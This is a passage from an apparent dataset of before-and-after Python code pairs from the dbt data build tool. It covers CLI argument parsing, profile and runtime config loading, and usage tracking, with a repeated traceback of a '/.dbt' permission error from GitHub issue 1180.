File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
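The after_merge column here replaces field-by-field `.get()` defaulting (the before_merge column) with a single `UserConfig.from_dict(user_cfg)`, centralizing the defaults on the config class. A minimal sketch of that pattern; `UserConfig` below is a stand-in and the default values are assumptions:

```python
DEFAULT_SEND_ANONYMOUS_USAGE_STATS = True
DEFAULT_USE_COLORS = True

class UserConfig:
    def __init__(self, send_anonymous_usage_stats, use_colors):
        self.send_anonymous_usage_stats = send_anonymous_usage_stats
        self.use_colors = use_colors

    @classmethod
    def from_dict(cls, raw=None):
        # Defaulting lives here, once, instead of at every call site.
        raw = raw or {}
        return cls(
            send_anonymous_usage_stats=raw.get(
                "send_anonymous_usage_stats",
                DEFAULT_SEND_ANONYMOUS_USAGE_STATS,
            ),
            use_colors=raw.get("use_colors", DEFAULT_USE_COLORS),
        )

cfg = UserConfig.from_dict({"use_colors": False})
print(cfg.send_anonymous_usage_stats, cfg.use_colors)  # True False
```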
def from_args(cls, args, project_profile_name=None, cli_vars=None):
"""Given the raw profiles as read from disk and the name of the desired
profile if specified, return the profile component of the runtime
config.
:param args argparse.Namespace: The arguments as parsed from the cli.
:param cli_vars dict: The command-line variables passed as arguments,
as a dict.
:param project_profile_name Optional[str]: The profile name, if
specified in a project.
:raises DbtProjectError: If there is no profile name specified in the
project or the command line arguments, or if the specified profile
is not found
:raises DbtProfileError: If the profile is invalid or missing, or the
target could not be found.
:returns Profile: The new Profile object.
"""
if cli_vars is None:
cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
threads_override = getattr(args, "threads", None)
target_override = getattr(args, "target", None)
raw_profiles = read_profile(args.profiles_dir)
profile_name = cls.pick_profile_name(args.profile, project_profile_name)
return cls.from_raw_profiles(
raw_profiles=raw_profiles,
profile_name=profile_name,
cli_vars=cli_vars,
target_override=target_override,
threads_override=threads_override,
)
|
def from_args(cls, args, project_profile_name=None, cli_vars=None):
"""Given the raw profiles as read from disk and the name of the desired
profile if specified, return the profile component of the runtime
config.
:param args argparse.Namespace: The arguments as parsed from the cli.
:param cli_vars dict: The command-line variables passed as arguments,
as a dict.
:param project_profile_name Optional[str]: The profile name, if
specified in a project.
:raises DbtProjectError: If there is no profile name specified in the
project or the command line arguments, or if the specified profile
is not found
:raises DbtProfileError: If the profile is invalid or missing, or the
target could not be found.
:returns Profile: The new Profile object.
"""
if cli_vars is None:
cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
threads_override = getattr(args, "threads", None)
# TODO(jeb): is it even possible for this to not be set?
profiles_dir = getattr(args, "profiles_dir", PROFILES_DIR)
target_override = getattr(args, "target", None)
raw_profiles = read_profile(profiles_dir)
profile_name = cls.pick_profile_name(args.profile, project_profile_name)
return cls.from_raw_profiles(
raw_profiles=raw_profiles,
profile_name=profile_name,
cli_vars=cli_vars,
target_override=target_override,
threads_override=threads_override,
)
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def __init__(
self,
project_name,
version,
project_root,
source_paths,
macro_paths,
data_paths,
test_paths,
analysis_paths,
docs_paths,
target_path,
clean_targets,
log_path,
modules_path,
quoting,
models,
on_run_start,
on_run_end,
archive,
seeds,
profile_name,
target_name,
config,
threads,
credentials,
packages,
args,
):
# 'vars'
self.args = args
self.cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
# 'project'
Project.__init__(
self,
project_name=project_name,
version=version,
project_root=project_root,
profile_name=profile_name,
source_paths=source_paths,
macro_paths=macro_paths,
data_paths=data_paths,
test_paths=test_paths,
analysis_paths=analysis_paths,
docs_paths=docs_paths,
target_path=target_path,
clean_targets=clean_targets,
log_path=log_path,
modules_path=modules_path,
quoting=quoting,
models=models,
on_run_start=on_run_start,
on_run_end=on_run_end,
archive=archive,
seeds=seeds,
packages=packages,
)
# 'profile'
Profile.__init__(
self,
profile_name=profile_name,
target_name=target_name,
config=config,
threads=threads,
credentials=credentials,
)
self.validate()
|
def __init__(
self,
project_name,
version,
project_root,
source_paths,
macro_paths,
data_paths,
test_paths,
analysis_paths,
docs_paths,
target_path,
clean_targets,
log_path,
modules_path,
quoting,
models,
on_run_start,
on_run_end,
archive,
seeds,
profile_name,
target_name,
send_anonymous_usage_stats,
use_colors,
threads,
credentials,
packages,
args,
):
# 'vars'
self.args = args
self.cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
# 'project'
Project.__init__(
self,
project_name=project_name,
version=version,
project_root=project_root,
profile_name=profile_name,
source_paths=source_paths,
macro_paths=macro_paths,
data_paths=data_paths,
test_paths=test_paths,
analysis_paths=analysis_paths,
docs_paths=docs_paths,
target_path=target_path,
clean_targets=clean_targets,
log_path=log_path,
modules_path=modules_path,
quoting=quoting,
models=models,
on_run_start=on_run_start,
on_run_end=on_run_end,
archive=archive,
seeds=seeds,
packages=packages,
)
# 'profile'
Profile.__init__(
self,
profile_name=profile_name,
target_name=target_name,
send_anonymous_usage_stats=send_anonymous_usage_stats,
use_colors=use_colors,
threads=threads,
credentials=credentials,
)
self.validate()
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
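`RuntimeConfig` in the row above mixes the `Project` and `Profile` constructors by calling each base initializer explicitly with its own slice of the keyword arguments, rather than chaining through `super()`. A stripped-down sketch of that composition pattern:

```python
class Project:
    def __init__(self, project_name):
        self.project_name = project_name

class Profile:
    def __init__(self, profile_name, threads):
        self.profile_name = profile_name
        self.threads = threads

class RuntimeConfig(Project, Profile):
    def __init__(self, project_name, profile_name, threads):
        # Each base gets exactly its own parameters; the two sets are
        # disjoint, so explicit calls are clearer than super() here.
        Project.__init__(self, project_name=project_name)
        Profile.__init__(self, profile_name=profile_name, threads=threads)

cfg = RuntimeConfig("debug", "debug", 4)
print(cfg.project_name, cfg.threads)  # debug 4
```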
def from_parts(cls, project, profile, args):
"""Instantiate a RuntimeConfig from its components.
:param profile Profile: A parsed dbt Profile.
:param project Project: A parsed dbt Project.
:param args argparse.Namespace: The parsed command-line arguments.
:returns RuntimeConfig: The new configuration.
"""
quoting = deepcopy(
get_relation_class_by_name(profile.credentials.type).DEFAULTS["quote_policy"]
)
quoting.update(project.quoting)
return cls(
project_name=project.project_name,
version=project.version,
project_root=project.project_root,
source_paths=project.source_paths,
macro_paths=project.macro_paths,
data_paths=project.data_paths,
test_paths=project.test_paths,
analysis_paths=project.analysis_paths,
docs_paths=project.docs_paths,
target_path=project.target_path,
clean_targets=project.clean_targets,
log_path=project.log_path,
modules_path=project.modules_path,
quoting=quoting,
models=project.models,
on_run_start=project.on_run_start,
on_run_end=project.on_run_end,
archive=project.archive,
seeds=project.seeds,
packages=project.packages,
profile_name=profile.profile_name,
target_name=profile.target_name,
config=profile.config,
threads=profile.threads,
credentials=profile.credentials,
args=args,
)
|
def from_parts(cls, project, profile, args):
"""Instantiate a RuntimeConfig from its components.
:param profile Profile: A parsed dbt Profile.
:param project Project: A parsed dbt Project.
:param args argparse.Namespace: The parsed command-line arguments.
:returns RuntimeConfig: The new configuration.
"""
quoting = deepcopy(
get_relation_class_by_name(profile.credentials.type).DEFAULTS["quote_policy"]
)
quoting.update(project.quoting)
return cls(
project_name=project.project_name,
version=project.version,
project_root=project.project_root,
source_paths=project.source_paths,
macro_paths=project.macro_paths,
data_paths=project.data_paths,
test_paths=project.test_paths,
analysis_paths=project.analysis_paths,
docs_paths=project.docs_paths,
target_path=project.target_path,
clean_targets=project.clean_targets,
log_path=project.log_path,
modules_path=project.modules_path,
quoting=quoting,
models=project.models,
on_run_start=project.on_run_start,
on_run_end=project.on_run_end,
archive=project.archive,
seeds=project.seeds,
packages=project.packages,
profile_name=profile.profile_name,
target_name=profile.target_name,
send_anonymous_usage_stats=profile.send_anonymous_usage_stats,
use_colors=profile.use_colors,
threads=profile.threads,
credentials=profile.credentials,
args=args,
)
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def handle_and_check(args):
parsed = parse_args(args)
profiler_enabled = False
if parsed.record_timing_info:
profiler_enabled = True
with dbt.profiler.profiler(
enable=profiler_enabled, outfile=parsed.record_timing_info
):
initialize_config_values(parsed)
reset_adapters()
try:
task, res = run_from_args(parsed)
finally:
dbt.tracking.flush()
success = task.interpret_results(res)
return res, success
|
def handle_and_check(args):
parsed = parse_args(args)
profiler_enabled = False
if parsed.record_timing_info:
profiler_enabled = True
with dbt.profiler.profiler(
enable=profiler_enabled, outfile=parsed.record_timing_info
):
# this needs to happen after args are parsed so we can determine the
# correct profiles.yml file
profile_config = read_config(parsed.profiles_dir)
if not send_anonymous_usage_stats(profile_config):
dbt.tracking.do_not_track()
else:
dbt.tracking.initialize_tracking()
if colorize_output(profile_config):
dbt.ui.printer.use_colors()
reset_adapters()
try:
task, res = run_from_args(parsed)
finally:
dbt.tracking.flush()
success = task.interpret_results(res)
return res, success
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
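Both columns in this row gate tracking on the user config read from the parsed `--profiles-dir` (the after_merge folds that work into `initialize_config_values`), so tracking and its cookie directory are only touched when stats are enabled. A sketch of a defensive config read that never raises on a missing or unreadable profiles directory; the helper names are illustrative, the default is an assumption, and PyYAML is required:

```python
import os
import yaml

DEFAULT_SEND_ANONYMOUS_USAGE_STATS = True

def read_user_config(profiles_dir):
    # Best-effort read of the config: block in profiles.yml. A missing
    # or unreadable file yields {}, so this can run before tracking
    # (and its cookie directory) is ever set up.
    path = os.path.join(profiles_dir, "profiles.yml")
    try:
        with open(path) as fh:
            profiles = yaml.safe_load(fh) or {}
    except OSError:
        return {}
    return profiles.get("config", {}) or {}

def send_anonymous_usage_stats(user_config):
    return user_config.get("send_anonymous_usage_stats",
                           DEFAULT_SEND_ANONYMOUS_USAGE_STATS)

cfg = read_user_config(os.path.expanduser("~/.dbt"))
print(send_anonymous_usage_stats(cfg))
```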
def parse_args(args):
p = DBTArgumentParser(
prog="dbt: data build tool",
formatter_class=argparse.RawTextHelpFormatter,
description="An ELT tool for managing your SQL "
"transformations and data models."
"\nFor more documentation on these commands, visit: "
"docs.getdbt.com",
epilog="Specify one of these sub-commands and you can "
"find more help from there.",
)
p.add_argument("--version", action="dbtversion", help="Show version information")
p.add_argument(
"-r",
"--record-timing-info",
default=None,
type=str,
help="""
When this option is passed, dbt will output low-level timing
stats to the specified file. Example:
`--record-timing-info output.profile`
""",
)
p.add_argument(
"-d",
"--debug",
action="store_true",
help="""Display debug logging during dbt execution. Useful for
debugging and making bug reports.""",
)
p.add_argument(
"-S",
"--strict",
action="store_true",
help="""Run schema validations at runtime. This will surface
bugs in dbt, but may incur a performance penalty.""",
)
# if set, run dbt in single-threaded mode: thread count is ignored, and
# calls go through `map` instead of the thread pool. This is useful for
# getting performance information about aspects of dbt that normally run in
# a thread, as the profiler ignores child threads. Users should really
# never use this.
p.add_argument(
"--single-threaded",
action="store_true",
help=argparse.SUPPRESS,
)
subs = p.add_subparsers(title="Available sub-commands")
base_subparser = argparse.ArgumentParser(add_help=False)
base_subparser.add_argument(
"--profiles-dir",
default=PROFILES_DIR,
type=str,
help="""
Which directory to look in for the profiles.yml file. Default = {}
""".format(PROFILES_DIR),
)
base_subparser.add_argument(
"--profile",
required=False,
type=str,
help="""
Which profile to load. Overrides setting in dbt_project.yml.
""",
)
base_subparser.add_argument(
"--target",
default=None,
type=str,
help="Which target to load for the given profile",
)
base_subparser.add_argument(
"--vars",
type=str,
default="{}",
help="""
Supply variables to the project. This argument overrides
variables defined in your dbt_project.yml file. This argument
should be a YAML string, eg. '{my_variable: my_value}'""",
)
# if set, log all cache events. This is extremely verbose!
base_subparser.add_argument(
"--log-cache-events",
action="store_true",
help=argparse.SUPPRESS,
)
base_subparser.add_argument(
"--bypass-cache",
action="store_false",
dest="use_cache",
help="If set, bypass the adapter-level cache of database state",
)
sub = subs.add_parser(
"init", parents=[base_subparser], help="Initialize a new DBT project."
)
sub.add_argument("project_name", type=str, help="Name of the new project")
sub.set_defaults(cls=init_task.InitTask, which="init")
sub = subs.add_parser(
"clean",
parents=[base_subparser],
help="Delete all folders in the clean-targets list"
"\n(usually the dbt_modules and target directories.)",
)
sub.set_defaults(cls=clean_task.CleanTask, which="clean")
sub = subs.add_parser(
"debug",
parents=[base_subparser],
help="Show some helpful information about dbt for debugging."
"\nNot to be confused with the --debug option which increases "
"verbosity.",
)
sub.add_argument(
"--config-dir",
action="store_true",
help="""
If specified, DBT will show path information for this project
""",
)
sub.set_defaults(cls=debug_task.DebugTask, which="debug")
sub = subs.add_parser(
"deps",
parents=[base_subparser],
help="Pull the most recent version of the dependencies listed in packages.yml",
)
sub.set_defaults(cls=deps_task.DepsTask, which="deps")
sub = subs.add_parser(
"archive",
parents=[base_subparser],
help="Record changes to a mutable table over time."
"\nMust be configured in your dbt_project.yml.",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while archiving tables. Overrides
settings in profiles.yml.
""",
)
sub.set_defaults(cls=archive_task.ArchiveTask, which="archive")
run_sub = subs.add_parser(
"run",
parents=[base_subparser],
help="Compile SQL and execute against the current target database.",
)
run_sub.set_defaults(cls=run_task.RunTask, which="run")
compile_sub = subs.add_parser(
"compile",
parents=[base_subparser],
help="Generates executable SQL from source model, test, and"
"analysis files. \nCompiled SQL files are written to the target/"
"directory.",
)
compile_sub.set_defaults(cls=compile_task.CompileTask, which="compile")
docs_sub = subs.add_parser(
"docs",
parents=[base_subparser],
help="Generate or serve the documentation website for your project.",
)
docs_subs = docs_sub.add_subparsers()
# it might look like docs_sub is the correct parents entry, but that
# will cause weird errors about 'conflicting option strings'.
generate_sub = docs_subs.add_parser("generate", parents=[base_subparser])
generate_sub.set_defaults(cls=generate_task.GenerateTask, which="generate")
generate_sub.add_argument(
"--no-compile",
action="store_false",
dest="compile",
help='Do not run "dbt compile" as part of docs generation',
)
for sub in [run_sub, compile_sub, generate_sub]:
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to include.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude.
""",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing models. Overrides
settings in profiles.yml.
""",
)
sub.add_argument(
"--non-destructive",
action="store_true",
help="""
If specified, DBT will not drop views. Tables will be truncated
instead of dropped.
""",
)
sub.add_argument(
"--full-refresh",
action="store_true",
help="""
If specified, DBT will drop incremental models and
fully-recalculate the incremental table from the model definition.
""",
)
seed_sub = subs.add_parser(
"seed",
parents=[base_subparser],
help="Load data from csv files into your data warehouse.",
)
seed_sub.add_argument(
"--drop-existing",
action="store_true",
help="(DEPRECATED) Use --full-refresh instead.",
)
seed_sub.add_argument(
"--full-refresh",
action="store_true",
help="Drop existing seed tables and recreate them",
)
seed_sub.add_argument(
"--show",
action="store_true",
help="Show a sample of the loaded data in the terminal",
)
seed_sub.set_defaults(cls=seed_task.SeedTask, which="seed")
serve_sub = docs_subs.add_parser("serve", parents=[base_subparser])
serve_sub.add_argument(
"--port",
default=8080,
type=int,
help="Specify the port number for the docs server.",
)
serve_sub.set_defaults(cls=serve_task.ServeTask, which="serve")
sub = subs.add_parser(
"test",
parents=[base_subparser],
help="Runs tests on data in deployed models.Run this after `dbt run`",
)
sub.add_argument(
"--data",
action="store_true",
help='Run data tests defined in "tests" directory.',
)
sub.add_argument(
"--schema",
action="store_true",
help="Run constraint validations from schema.yml files",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing tests. Overrides
settings in profiles.yml
""",
)
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to test.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude from testing.
""",
)
sub.set_defaults(cls=test_task.TestTask, which="test")
if len(args) == 0:
p.print_help()
sys.exit(1)
parsed = p.parse_args(args)
parsed.profiles_dir = os.path.expanduser(parsed.profiles_dir)
if not hasattr(parsed, "which"):
# the user did not provide a valid subcommand. trigger the help message
# and exit with a error
p.print_help()
p.exit(1)
return parsed
|
def parse_args(args):
p = DBTArgumentParser(
prog="dbt: data build tool",
formatter_class=argparse.RawTextHelpFormatter,
description="An ELT tool for managing your SQL "
"transformations and data models."
"\nFor more documentation on these commands, visit: "
"docs.getdbt.com",
epilog="Specify one of these sub-commands and you can "
"find more help from there.",
)
p.add_argument("--version", action="dbtversion", help="Show version information")
p.add_argument(
"-r",
"--record-timing-info",
default=None,
type=str,
help="""
When this option is passed, dbt will output low-level timing
stats to the specified file. Example:
`--record-timing-info output.profile`
""",
)
p.add_argument(
"-d",
"--debug",
action="store_true",
help="""Display debug logging during dbt execution. Useful for
debugging and making bug reports.""",
)
p.add_argument(
"-S",
"--strict",
action="store_true",
help="""Run schema validations at runtime. This will surface
bugs in dbt, but may incur a performance penalty.""",
)
# if set, run dbt in single-threaded mode: thread count is ignored, and
# calls go through `map` instead of the thread pool. This is useful for
# getting performance information about aspects of dbt that normally run in
# a thread, as the profiler ignores child threads. Users should really
# never use this.
p.add_argument(
"--single-threaded",
action="store_true",
help=argparse.SUPPRESS,
)
subs = p.add_subparsers(title="Available sub-commands")
base_subparser = argparse.ArgumentParser(add_help=False)
base_subparser.add_argument(
"--profiles-dir",
default=PROFILES_DIR,
type=str,
help="""
Which directory to look in for the profiles.yml file. Default = {}
""".format(PROFILES_DIR),
)
base_subparser.add_argument(
"--profile",
required=False,
type=str,
help="""
Which profile to load. Overrides setting in dbt_project.yml.
""",
)
base_subparser.add_argument(
"--target",
default=None,
type=str,
help="Which target to load for the given profile",
)
base_subparser.add_argument(
"--vars",
type=str,
default="{}",
help="""
Supply variables to the project. This argument overrides
variables defined in your dbt_project.yml file. This argument
should be a YAML string, eg. '{my_variable: my_value}'""",
)
# if set, log all cache events. This is extremely verbose!
base_subparser.add_argument(
"--log-cache-events",
action="store_true",
help=argparse.SUPPRESS,
)
base_subparser.add_argument(
"--bypass-cache",
action="store_false",
dest="use_cache",
help="If set, bypass the adapter-level cache of database state",
)
sub = subs.add_parser(
"init", parents=[base_subparser], help="Initialize a new DBT project."
)
sub.add_argument("project_name", type=str, help="Name of the new project")
sub.set_defaults(cls=init_task.InitTask, which="init")
sub = subs.add_parser(
"clean",
parents=[base_subparser],
help="Delete all folders in the clean-targets list"
"\n(usually the dbt_modules and target directories.)",
)
sub.set_defaults(cls=clean_task.CleanTask, which="clean")
sub = subs.add_parser(
"debug",
parents=[base_subparser],
help="Show some helpful information about dbt for debugging."
"\nNot to be confused with the --debug option which increases "
"verbosity.",
)
sub.add_argument(
"--config-dir",
action="store_true",
help="""
If specified, DBT will show path information for this project
""",
)
sub.set_defaults(cls=debug_task.DebugTask, which="debug")
sub = subs.add_parser(
"deps",
parents=[base_subparser],
help="Pull the most recent version of the dependencies listed in packages.yml",
)
sub.set_defaults(cls=deps_task.DepsTask, which="deps")
sub = subs.add_parser(
"archive",
parents=[base_subparser],
help="Record changes to a mutable table over time."
"\nMust be configured in your dbt_project.yml.",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while archiving tables. Overrides
settings in profiles.yml.
""",
)
sub.set_defaults(cls=archive_task.ArchiveTask, which="archive")
run_sub = subs.add_parser(
"run",
parents=[base_subparser],
help="Compile SQL and execute against the current target database.",
)
run_sub.set_defaults(cls=run_task.RunTask, which="run")
compile_sub = subs.add_parser(
"compile",
parents=[base_subparser],
help="Generates executable SQL from source model, test, and"
"analysis files. \nCompiled SQL files are written to the target/"
"directory.",
)
compile_sub.set_defaults(cls=compile_task.CompileTask, which="compile")
docs_sub = subs.add_parser(
"docs",
parents=[base_subparser],
help="Generate or serve the documentation website for your project.",
)
docs_subs = docs_sub.add_subparsers()
# it might look like docs_sub is the correct parents entry, but that
# will cause weird errors about 'conflicting option strings'.
generate_sub = docs_subs.add_parser("generate", parents=[base_subparser])
generate_sub.set_defaults(cls=generate_task.GenerateTask, which="generate")
generate_sub.add_argument(
"--no-compile",
action="store_false",
dest="compile",
help='Do not run "dbt compile" as part of docs generation',
)
for sub in [run_sub, compile_sub, generate_sub]:
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to include.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude.
""",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing models. Overrides
settings in profiles.yml.
""",
)
sub.add_argument(
"--non-destructive",
action="store_true",
help="""
If specified, DBT will not drop views. Tables will be truncated
instead of dropped.
""",
)
sub.add_argument(
"--full-refresh",
action="store_true",
help="""
If specified, DBT will drop incremental models and
fully-recalculate the incremental table from the model definition.
""",
)
seed_sub = subs.add_parser(
"seed",
parents=[base_subparser],
help="Load data from csv files into your data warehouse.",
)
seed_sub.add_argument(
"--drop-existing",
action="store_true",
help="(DEPRECATED) Use --full-refresh instead.",
)
seed_sub.add_argument(
"--full-refresh",
action="store_true",
help="Drop existing seed tables and recreate them",
)
seed_sub.add_argument(
"--show",
action="store_true",
help="Show a sample of the loaded data in the terminal",
)
seed_sub.set_defaults(cls=seed_task.SeedTask, which="seed")
serve_sub = docs_subs.add_parser("serve", parents=[base_subparser])
serve_sub.add_argument(
"--port",
default=8080,
type=int,
help="Specify the port number for the docs server.",
)
serve_sub.set_defaults(cls=serve_task.ServeTask, which="serve")
sub = subs.add_parser(
"test",
parents=[base_subparser],
help="Runs tests on data in deployed models.Run this after `dbt run`",
)
sub.add_argument(
"--data",
action="store_true",
help='Run data tests defined in "tests" directory.',
)
sub.add_argument(
"--schema",
action="store_true",
help="Run constraint validations from schema.yml files",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing tests. Overrides
settings in profiles.yml.
""",
)
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to test.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude from testing.
""",
)
sub.set_defaults(cls=test_task.TestTask, which="test")
if len(args) == 0:
p.print_help()
sys.exit(1)
parsed = p.parse_args(args)
if not hasattr(parsed, "which"):
# the user did not provide a valid subcommand. trigger the help message
# and exit with a error
p.print_help()
p.exit(1)
return parsed
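
A note on the `hasattr(parsed, "which")` guard above: argparse subparsers are optional by default on Python 3, so `parse_args` can succeed without any subcommand being chosen, in which case none of the `set_defaults(which=...)` calls fire. A standalone sketch of the same pattern (names here are illustrative, not dbt's):

import argparse
import sys

def parse_args(args):
    p = argparse.ArgumentParser(prog="demo")
    subs = p.add_subparsers()
    run = subs.add_parser("run", help="Run the thing")
    run.set_defaults(which="run")
    if len(args) == 0:
        p.print_help()
        sys.exit(1)
    parsed = p.parse_args(args)
    if not hasattr(parsed, "which"):
        # No subcommand selected: argparse does not error out on its own
        # here, so print help and exit with a non-zero status.
        p.print_help()
        p.exit(1)
    return parsed

if __name__ == "__main__":
    print(parse_args(sys.argv[1:]))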
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def __init__(self, cookie_dir):
self.do_not_track = True
self.cookie_dir = cookie_dir
self.id = None
self.invocation_id = str(uuid.uuid4())
self.run_started_at = datetime.now(tz=pytz.utc)
|
def __init__(self):
self.do_not_track = True
self.id = None
self.invocation_id = str(uuid.uuid4())
self.run_started_at = datetime.now(tz=pytz.utc)
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
